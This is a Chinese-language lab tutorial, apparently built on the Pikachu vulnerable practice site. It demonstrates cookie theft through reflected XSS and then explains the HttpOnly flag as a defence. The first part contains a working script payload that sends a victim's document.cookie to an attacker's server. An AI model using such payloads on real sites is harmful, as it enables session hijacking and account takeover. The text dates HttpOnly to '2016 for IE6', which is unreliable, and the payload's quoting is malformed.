目录
2. 登录管理工具xss后台
盗取cookie
1. 测试是否能获取到cookie
如下我们可以知道当前页面是存在cookie的,通过document.cookie成功获取到了
2. 盗取cookie
因为页面存在xss漏洞,可以进行弹窗操作,既然能弹窗说明能执行js语句,那么在特定条件我们通过执行js语句可以获取cookie值。
受害者在未退出登录的情况下不小心点击了恶意链接,如下
192.168.189.129/2_Shotting_Range/pikachu-master/vul/xss/xss_reflected_get.php?message=<script>document.location = http://192.168.189.128/2_Shotting_Range/pikachu-master/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>&submit=submit
红色字体就是存在xss漏洞的位置,我们在这里放入获取cookie的payload。payload意思就是访问189.128页面并且携带cookie将cookie存储到指定页面中
然后点击访问,页面进行了跳转,跳转到hacker的服务器上
2. 查看是否获取到cookie
如下成功获取到信息
httponly
HttpOnly是2016年微软为IE6而新增了这一属性,HttpOnly是包含在http返回头Set-Cookie里面的一个附加的flag,所以它是后端服务器对cookie设置的一个附加的属性,在生成cookie时使用HttpOnly标志有助于减轻客户端脚本访问受保护cookie的风险。
也就是说HttpOnly存在主要是为了防止用户通过前端js来盗用cookie而产生的风险,例如XSS攻击就是对cookie进行盗窃,使用这一属性就可以防止通过js脚本读取到cookie信息,预防XSS攻击,窃取cookie内容
如下,在set-cookie没有设置httponly的情况下,通过document.cookie是可以获取到cookie值的
然后设置httponly
正确登录后,返回含有httponly的cookie值
然后再通过document.cookie,此时则获取不到cookie值了